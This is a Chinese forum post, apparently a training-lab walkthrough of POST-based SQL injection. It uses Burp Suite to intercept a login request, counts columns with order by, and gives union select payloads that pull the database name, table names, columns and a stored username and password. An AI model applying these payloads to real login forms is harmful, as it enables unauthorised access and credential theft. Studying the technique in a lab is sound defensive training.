本帖最后由 富贵花开 于 2025-3-9 17:12 编辑
《中华人民共和国网络安全法》 第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
什么是POST注入? 所谓POST注入就是我们在前端提交数据的时候,前端使用的是POST方式提交的数据。说白了,跟GET注入没有什么本质上的区别,无非就是提交数据的方式改变了,而注入的技巧思路都是一样的。
实操步骤 1、浏览器打开靶场, 登录框 先别输入账号密码
2、打开BP开启代理, 浏览器也开启代理。
3、开启抓包,然后登录框随便输入账号密码
4、查看BP抓的包
5、点击发送,查看正常的包的长度 (目前是 1523)
6、账号密码后面加上' 让他报错,然后查看长度 是否会有变化 ( 判断是否存在注入)
长度变成了 1599 说明是有注入的
7. order by X 看哪个数字返回正常 order by 2 是 1523
order by 3和4 都是 1471
7、and 1=2 unionselect 1,2 看数字在哪里
8、查看数据库名字 union select 1,database() 2显示数据库名 : security union select 1,database()
9、查看表名:emails,referers,uagents,users union select 1,group_concat(table_name)from information_schema.tables where table_schema='security'
10、查看表里面的数据 就 users 像是存在账号密码的地方 union select 1,group_concat(column_name)from information_schema.columns where table_schema='security' andtable_name='users'
数据有:id,username,passwor
11、查看users 里面的 username,password union select 1,username from users limit 1,2
union select 1,password from users limit 1,2
username : Angelina
passwor :I-kill-you
12、登录看看 看账号密码是否正确 (登录成功)
| 
楼主
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
发表于 2025-3-9 17:13
技术员3级 
